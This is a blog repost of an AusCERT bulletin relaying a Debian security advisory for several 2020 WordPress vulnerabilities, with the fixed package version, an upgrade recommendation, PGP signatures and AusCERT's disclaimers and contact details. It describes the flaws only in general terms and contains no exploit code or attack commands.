                 CVE-2020-28036 CVE-2020-28037 CVE-2020-28038 CVE-2020-28039 
                 CVE-2020-28040
Debian Bug     : 971914 973562

Several vulnerabilities were discovered in WordPress, a web blogging
tool. They allowed remote attackers to run insecure deserialization,
embed spam, perform various Cross-Site Scripting (XSS) or Cross-Site
Request Forgery (CSRF) attacks, escalate privileges, run arbitrary
code, and delete arbitrary files.

For the stable distribution (buster), these problems have been fixed in
version 5.0.11+dfsg1-0+deb10u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAl+lSYUACgkQEL6Jg/PV
nWStuwgAoDBZA5FLY+lIr5ioN46PD2SzjnNwBsyyBHHdu81Lbrid976RVFUfUsex
AtTQGIbDG3lr3DSL0lzwQKikgRnTHDO42PwP+dATpK3yH0sjr8xSSr3rqVITz+iB
qQVWc2UqHR+zUUbxoa6/W2V9y+zqVmm1BDvkIlbHw4x2m8/ErhrEo8FR9C3105I0
DdzQXxSFEEK6l/090I7gGtXIFHa9izk8AQ8pgytBTUAveWE/sLWdF1vHDfQhb3FY
HSPs/uzVvbLBDDfwr8xRWVjkL8kyism5ynmRwqtE+AiMqDWSVGlADdcZtcsyUeDt
WpOwXIdWwNIPrpalNbLeO/Bu2apvWw==
=Jo4W
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX6jJCeNLKJtyKPYoAQiYGhAAgdUGbKXXtujnKI+0OKKSfqa6UsCpSZsD
SwWqnD7l0TLXk5qhfT13uZBjjN8efa43BbugUX0Lv2H9BXmBMWdK1tnTUNUZlFYb
9chpZB7Dlc+VqYajHdLu9qAFmsRFOwpziPapkXoMC/QYpqtLAnBkfvLzMFybXJtR
RscqmKWHpC8FKCVRG91qrEnQY6trOl47phI85E9Wj7vsR2JAQPF9aflg7oGFHcNk
Mg7WLwE/b2BCy5A06S4z+Sz1cszjTPFRkBrSyetoWDnFUeXlC34BwexKGp6WHHMa
YvvJDJ4h+3naNHvh2HOgovN3lJBnS2cTcY0klHHYj4yfPxNztCadjNvgT0u53Pct
2p+e/IEZPmi2WfDadz4STRzecX9aBt8Pf3ucP6gi6ZIAt90yFCY9BtIPN01aFcB1
Wi+K0rtPlGSVYRgOS5kMMRK2aXwthj5atvKkKaYLsO1ARxxFTkRu0ZmwYRcc2/LX
ZKzXWtZn7w3mXSU8A57pNxBvyrdqEtoxI9wjM3AqsopcE3B17rSsZWnk4T1vUwVC
F1plNl5ls5i7QRxizPctqZ8mlM1mkuokWFrgWf6iAtoFU0EIVCvXFzyW3AOvCooN
AtRBOXBegUUUJpuIkq6cV4iY8vo+4d5vCECSldZ44oHf6aSKMnQGPKP2qU9tu/u2
b4Mw6gUwAFk=
=IQcp
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3938 – [Debian] wordpress: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/esb-2020-3938-debian-wordpress-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3938-debian-wordpress-multiple-vulnerabilities
at No comments:
Labels:
Subscribe to: Comments (Atom)

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...